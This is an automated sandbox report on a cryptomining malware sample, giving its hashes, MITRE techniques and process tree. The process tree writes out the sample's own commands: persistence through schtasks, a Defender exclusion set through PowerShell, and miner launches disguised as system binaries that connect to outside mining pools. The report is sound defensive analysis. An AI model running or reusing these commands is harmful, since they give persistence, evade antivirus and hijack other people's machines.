cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

General

Target

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Size

862KB
MD5

a69b4b080114c6c20c5471ad5613e3bf
SHA1

e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256

cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512

c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
SSDEEP

6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1376	DHUZT.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1832-105-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1832-107-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1832-108-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral1/memory/1832-110-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Loads dropped DLL 1 IoCs

pid	Process
1224	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1736	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
968	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1364	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1376	DHUZT.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 1364	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	32
PID 1912 wrote to memory of 1364	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	32
PID 1912 wrote to memory of 1364	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	32
PID 1912 wrote to memory of 1224	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	31
PID 1912 wrote to memory of 1224	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	31
PID 1912 wrote to memory of 1224	1912	cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe	31
PID 1224 wrote to memory of 968	1224	cmd.exe	30
PID 1224 wrote to memory of 968	1224	cmd.exe	30
PID 1224 wrote to memory of 968	1224	cmd.exe	30
PID 1224 wrote to memory of 1376	1224	cmd.exe	33
PID 1224 wrote to memory of 1376	1224	cmd.exe	33
PID 1224 wrote to memory of 1376	1224	cmd.exe	33
PID 1376 wrote to memory of 1768	1376	DHUZT.exe	38
PID 1376 wrote to memory of 1768	1376	DHUZT.exe	38
PID 1376 wrote to memory of 1768	1376	DHUZT.exe	38

C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
"C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF9DA.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      PID:912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:1768
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
      4⤵
      PID:860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:572
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux
      4⤵
      PID:1832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1364

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:968

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
1⤵
- Creates scheduled task(s)
PID:1736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Scripting

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF9DA.tmp.bat

Filesize
137B

MD5
fb94da3802806bbfcd5d4955f493ae74

SHA1
748807575d0946f05fdd2a09425fb06b58e84cd8

SHA256
09135d5dbb7e05be1f7f51ce2cbd9b81fa48b7c79b3b63b07856decfcde1548b

SHA512
9211534bdaa2c17bf1c467b85133462f8ec63c887c1b5f2f47d034bf2827ff8e5753d8a217a1f56781b4d1f3b75e7d7f1c688f82b9c571ab79c8799af404bc82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
92d0231cf4790cd32103ee55cb615ca7

SHA1
c825619979e9ff3dfb7e7b75d1da2720659512b6

SHA256
eaa2b868c38b4473ab833d2f71a532a6968f31c37e6ed897aae7e41a127aa0fd

SHA512
38c4e4eadfb5de60a6a9b857dcfdb82e596be6cc379656e5d7baf662285853841347f14237b2bb150e72e0c983a1042b9a8e679b6713938bb3ac7c0e8509417d

Download Submit
\ProgramData\ccl\DHUZT.exe

Filesize
862KB

MD5
a69b4b080114c6c20c5471ad5613e3bf

SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a

SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c

SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137

Download Submit
memory/860-111-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-101-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-86-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-88-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-89-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-92-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-97-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-83-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-95-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-84-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-103-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-93-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-91-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-94-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/860-98-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/1364-64-0x0000000002A64000-0x0000000002A67000-memory.dmp

Filesize
12KB

Download
memory/1364-65-0x0000000002A6B000-0x0000000002A8A000-memory.dmp

Filesize
124KB

Download
memory/1364-56-0x000007FEFC1F1000-0x000007FEFC1F3000-memory.dmp

Filesize
8KB

Download
memory/1364-60-0x000007FEEDDB0000-0x000007FEEE7D3000-memory.dmp

Filesize
10.1MB

Download
memory/1364-62-0x0000000002A64000-0x0000000002A67000-memory.dmp

Filesize
12KB

Download
memory/1364-61-0x000007FEF5F80000-0x000007FEF6ADD000-memory.dmp

Filesize
11.4MB

Download
memory/1364-63-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1376-70-0x0000000000E00000-0x0000000000EDC000-memory.dmp

Filesize
880KB

Download
memory/1768-76-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/1768-81-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/1768-75-0x000007FEED800000-0x000007FEEE223000-memory.dmp

Filesize
10.1MB

Download
memory/1768-77-0x000007FEECCA0000-0x000007FEED7FD000-memory.dmp

Filesize
11.4MB

Download
memory/1768-80-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

Filesize
3.0MB

Download
memory/1768-82-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download
memory/1832-104-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1832-105-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1832-107-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1832-108-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1832-110-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/1912-54-0x0000000001130000-0x000000000120C000-memory.dmp

Filesize
880KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads